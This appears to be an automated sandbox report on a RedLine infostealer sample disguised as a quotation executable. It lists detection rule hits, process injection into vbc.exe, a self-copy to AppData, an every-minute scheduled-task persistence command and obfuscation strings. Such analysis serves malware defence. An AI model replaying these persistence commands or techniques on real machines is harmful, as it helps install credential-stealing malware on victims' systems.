                        Source: initial sampleStatic PE information: Filename: QUOTATION062022.exe
                        Source: QUOTATION062022.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.QUOTATION062022.exe.39e2f90.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 11.2.Data.exe.3acb170.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 11.2.Data.exe.3ae2f90.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 23.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 23.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.QUOTATION062022.exe.39cb170.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 23.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.QUOTATION062022.exe.39cb170.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.QUOTATION062022.exe.39e2f90.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 23.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 23.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 23.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 11.2.Data.exe.3ae2f90.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 11.2.Data.exe.3acb170.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_0280A28F0_2_0280A28F
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_02802CB50_2_02802CB5
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04E7AF600_2_04E7AF60
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04E700400_2_04E70040
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04E7560C0_2_04E7560C
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04E800400_2_04E80040
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04E856C80_2_04E856C8
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04E900400_2_04E90040
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04E957280_2_04E95728
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04EB8E790_2_04EB8E79
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04EB1C780_2_04EB1C78
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04EB7E640_2_04EB7E64
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04E8001E0_2_04E8001E
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04E856B90_2_04E856B9
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04E957180_2_04E95718
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04E7AF500_2_04E7AF50
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_04E7001F0_2_04E7001F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0588DE104_2_0588DE10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0588FA304_2_0588FA30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0588D2F04_2_0588D2F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_073668F84_2_073668F8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0736BE804_2_0736BE80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_07361D984_2_07361D98
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_073626104_2_07362610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_073601904_2_07360190
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeCode function: 0_2_0280F458 CreateProcessAsUserA,0_2_0280F458
                        Source: QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs QUOTATION062022.exe
                        Source: QUOTATION062022.exe, 00000000.00000002.293203410.00000000029C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs QUOTATION062022.exe
                        Source: QUOTATION062022.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: QUOTATION062022.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: Data.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: Data.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: QUOTATION062022.exeVirustotal: Detection: 47%
                        Source: QUOTATION062022.exeReversingLabs: Detection: 48%
                        Source: QUOTATION062022.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION062022.exe "C:\Users\user\Desktop\QUOTATION062022.exe"
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\Desktop\QUOTATION062022.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Data\Data.exe C:\Users\user\AppData\Roaming\Data\Data.exe
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /fJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\Desktop\QUOTATION062022.exe" "C:\Users\user\AppData\Roaming\Data\Data.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /fJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /fJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeFile created: C:\Users\user\AppData\Roaming\DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\tmp772C.tmpJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/53@4/2
                        Source: QUOTATION062022.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                        Source: QUOTATION062022.exe, IgnoreSymbols.csBase64 encoded string: 'GOdYbjf0HH/3c4u/gKAthdsOgjVR+eO32MIXA5prvnEZywjJbqkx9UK5f+cQ/zSTBzxYm4vEbHo='
                        Source: 0.2.QUOTATION062022.exe.890000.0.unpack, IgnoreSymbols.csBase64 encoded string: 'GOdYbjf0HH/3c4u/gKAthdsOgjVR+eO32MIXA5prvnEZywjJbqkx9UK5f+cQ/zSTBzxYm4vEbHo='
                        Source: 0.0.QUOTATION062022.exe.890000.0.unpack, IgnoreSymbols.csBase64 encoded string: 'GOdYbjf0HH/3c4u/gKAthdsOgjVR+eO32MIXA5prvnEZywjJbqkx9UK5f+cQ/zSTBzxYm4vEbHo='
                        Source: Data.exe.9.dr, IgnoreSymbols.csBase64 encoded string: 'GOdYbjf0HH/3c4u/gKAthdsOgjVR+eO32MIXA5prvnEZywjJbqkx9UK5f+cQ/zSTBzxYm4vEbHo='
                        Source: 11.2.Data.exe.e00000.0.unpack, IgnoreSymbols.csBase64 encoded string: 'GOdYbjf0HH/3c4u/gKAthdsOgjVR+eO32MIXA5prvnEZywjJbqkx9UK5f+cQ/zSTBzxYm4vEbHo='
                        Source: 11.0.Data.exe.e00000.0.unpack, IgnoreSymbols.csBase64 encoded string: 'GOdYbjf0HH/3c4u/gKAthdsOgjVR+eO32MIXA5prvnEZywjJbqkx9UK5f+cQ/zSTBzxYm4vEbHo='
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_01
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: QUOTATION062022.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: QUOTATION062022.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Data Obfuscation

                        barindex
                        Source: QUOTATION062022.exeString found in binary or memory: dotNetProtector
                        Source: QUOTATION062022.exe, 00000000.00000000.240683863.0000000000892000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: dotNetProtector
                        Source: QUOTATION062022.exe, 00000000.00000000.240683863.0000000000892000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: [(oTokenCompareToGetDynamicILInfoFieldInfoMethodInfoExceptionDispatchInfostartupInfoMemberInfoParameterInfoProcessStartInfoConsoleKeyInfoDirectoryInfoCapnumNotZeroSleepsdgpGetTimeDateStamp9IxpSystem.LinqMaxCalendarYearTmLastChar_defaultReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilder_EventBuilderAssemblyBuilderSpecialFolderM_decoderEncoderBufferlpBfdsdhsdsdsfufferResourceManagerGet_MetaDataLoggerDebuggerDummyMetaDataListener_keycomparerGet_CreatePdbSymbolWriterget_IsPointerGet_MethodDecrypterBitConverterGetKeyPairGetTokenForFloorset_RedirectStandardErrorParsingErrorActivator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorIntPtrfagfdgdasAbsSystem.DiagnosticsdsdsdhddsGet_PreserveFieldRidsAllocateTypeDefRidsGetMethodsget_HasNamespacesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.Resourcesrnpdijrgda.resourcesUnEscapeDotsAndSlashesbInhderitfdfHandlesUseSpacesInDayNamesICorLibTypesGet_TableTypesNumNewTypesEmptyTypesGetAssociateslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesInitializeCustomAttributesGetCustomAttributes_numBytesNumberBufferBytesGetBytesGetIndexesSectionSizesGet_LegalKeySizesParseFlagsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsInitializeCompatibilityFlagsfhddsdhsGet_PostSearchPathsCreateThisSpecialsEqualsIgnoreSymbolsSystem.Windows.FormsTooManyParensCallingConventionsCosOverlapsGetFieldPropsGroupsAddYearsget_CharsGetOptionalCustomModifiersGetParametersFindConstructorsWinMDClassget_IsClassAssemblyBuilderAccessGetCurrentProcesshPhrdasocesshPfdsfhdsdrodscesslpfsdfAfdsddsadresslpBasfsdsdfeddfhsAddressRemoveAllDocumentsset_ArgumentsGet_Days
                        Source: QUOTATION062022.exe, 00000000.00000002.291392022.0000000000892000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: dotNetProtector
                        Source: QUOTATION062022.exe, 00000000.00000002.291392022.0000000000892000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: [(oTokenCompareToGetDynamicILInfoFieldInfoMethodInfoExceptionDispatchInfostartupInfoMemberInfoParameterInfoProcessStartInfoConsoleKeyInfoDirectoryInfoCapnumNotZeroSleepsdgpGetTimeDateStamp9IxpSystem.LinqMaxCalendarYearTmLastChar_defaultReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilder_EventBuilderAssemblyBuilderSpecialFolderM_decoderEncoderBufferlpBfdsdhsdsdsfufferResourceManagerGet_MetaDataLoggerDebuggerDummyMetaDataListener_keycomparerGet_CreatePdbSymbolWriterget_IsPointerGet_MethodDecrypterBitConverterGetKeyPairGetTokenForFloorset_RedirectStandardErrorParsingErrorActivator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorIntPtrfagfdgdasAbsSystem.DiagnosticsdsdsdhddsGet_PreserveFieldRidsAllocateTypeDefRidsGetMethodsget_HasNamespacesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.Resourcesrnpdijrgda.resourcesUnEscapeDotsAndSlashesbInhderitfdfHandlesUseSpacesInDayNamesICorLibTypesGet_TableTypesNumNewTypesEmptyTypesGetAssociateslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesInitializeCustomAttributesGetCustomAttributes_numBytesNumberBufferBytesGetBytesGetIndexesSectionSizesGet_LegalKeySizesParseFlagsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsInitializeCompatibilityFlagsfhddsdhsGet_PostSearchPathsCreateThisSpecialsEqualsIgnoreSymbolsSystem.Windows.FormsTooManyParensCallingConventionsCosOverlapsGetFieldPropsGroupsAddYearsget_CharsGetOptionalCustomModifiersGetParametersFindConstructorsWinMDClassget_IsClassAssemblyBuilderAccessGetCurrentProcesshPhrdasocesshPfdsfhdsdrodscesslpfsdfAfdsddsadresslpBasfsdsdfeddfhsAddressRemoveAllDocumentsset_ArgumentsGet_Days
                        Source: Data.exe, 0000000B.00000000.291177733.0000000000E02000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: dotNetProtector
                        Source: Data.exe, 0000000B.00000000.291177733.0000000000E02000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: [(oTokenCompareToGetDynamicILInfoFieldInfoMethodInfoExceptionDispatchInfostartupInfoMemberInfoParameterInfoProcessStartInfoConsoleKeyInfoDirectoryInfoCapnumNotZeroSleepsdgpGetTimeDateStamp9IxpSystem.LinqMaxCalendarYearTmLastChar_defaultReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilder_EventBuilderAssemblyBuilderSpecialFolderM_decoderEncoderBufferlpBfdsdhsdsdsfufferResourceManagerGet_MetaDataLoggerDebuggerDummyMetaDataListener_keycomparerGet_CreatePdbSymbolWriterget_IsPointerGet_MethodDecrypterBitConverterGetKeyPairGetTokenForFloorset_RedirectStandardErrorParsingErrorActivator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorIntPtrfagfdgdasAbsSystem.DiagnosticsdsdsdhddsGet_PreserveFieldRidsAllocateTypeDefRidsGetMethodsget_HasNamespacesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.Resourcesrnpdijrgda.resourcesUnEscapeDotsAndSlashesbInhderitfdfHandlesUseSpacesInDayNamesICorLibTypesGet_TableTypesNumNewTypesEmptyTypesGetAssociateslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesInitializeCustomAttributesGetCustomAttributes_numBytesNumberBufferBytesGetBytesGetIndexesSectionSizesGet_LegalKeySizesParseFlagsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsInitializeCompatibilityFlagsfhddsdhsGet_PostSearchPathsCreateThisSpecialsEqualsIgnoreSymbolsSystem.Windows.FormsTooManyParensCallingConventionsCosOverlapsGetFieldPropsGroupsAddYearsget_CharsGetOptionalCustomModifiersGetParametersFindConstructorsWinMDClassget_IsClassAssemblyBuilderAccessGetCurrentProcesshPhrdasocesshPfdsfhdsdrodscesslpfsdfAfdsddsadresslpBasfsdsdfeddfhsAddressRemoveAllDocumentsset_ArgumentsGet_Days
                        Source: Data.exe, 0000000B.00000002.360772652.0000000000E02000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: dotNetProtector
                        Source: Data.exe, 0000000B.00000002.360772652.0000000000E02000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: 